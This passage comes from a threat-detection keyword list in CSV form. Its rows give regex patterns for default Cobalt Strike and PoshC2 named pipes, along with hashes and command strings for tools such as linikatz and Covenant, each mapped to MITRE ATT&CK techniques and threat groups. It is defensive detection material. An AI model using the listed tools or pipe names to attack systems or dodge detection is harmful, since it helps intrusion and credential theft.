T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\mypipe-*","\\\\mypipe\-.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang 
Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\netlogon_*","\\\\netlogon_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\ntsvcs*","\\\\ntsvcs.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 
- T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\PGMessagePipe*","\\\\PGMessagePipe.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\postex_*","\\\\postex_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\postex_ssh_*","\\\\postex_ssh_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\samr_*","\\\\samr_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\scerpc_*","\\\\scerpc_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\SearchTextHarvester*","\\\\SearchTextHarvester.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\spoolss_*","\\\\spoolss_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens 
- Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\srvsvc_*","\\\\srvsvc_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\status_*","\\\\status_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\UIA_PIPE*","\\\\UIA_PIPE.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\win\msrpc_*","\\\\win\\msrpc_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\winsock*","\\\\winsock.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\Winsock2\CatalogChangeListener-*","\\\\Winsock2\\CatalogChangeListener\-.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 
- FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\wkssvc_*","\\\\wkssvc_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\adhunt.py","\\adhunt\.py","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" 
"\jaccdpqnvbrrxlaf*","\\jaccdpqnvbrrxlaf.{0,1000}","offensive_tool_keyword","poshc2","pipe name from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","pipe names (sysmon EID 17 - 18)","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "\Posh*","\\Posh.{0,1000}","offensive_tool_keyword","poshc2","pipe name from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","pipe names (sysmon EID 17 - 18)","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "afrog -*","afrog\s\-.{0,1000}","offensive_tool_keyword","afrog","A tool for finding vulnerabilities","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/zan8in/afrog","1","0","N/A","N/A","10","2823","334","2024-04-30T08:02:02Z","2022-02-24T06:00:32Z" "b2363d2b238f9336bb270fe96db258243668a916d7ddf94bf3a3126ed7cae508","b2363d2b238f9336bb270fe96db258243668a916d7ddf94bf3a3126ed7cae508","offensive_tool_keyword","linikatz","linikatz is a 
tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "b8ad30b89d6cabe30501ed963b21dcaec70b3283608682678629feae2c1b2235","b8ad30b89d6cabe30501ed963b21dcaec70b3283608682678629feae2c1b2235","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "BypassUAC *","BypassUAC\s.{0,1000}","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" 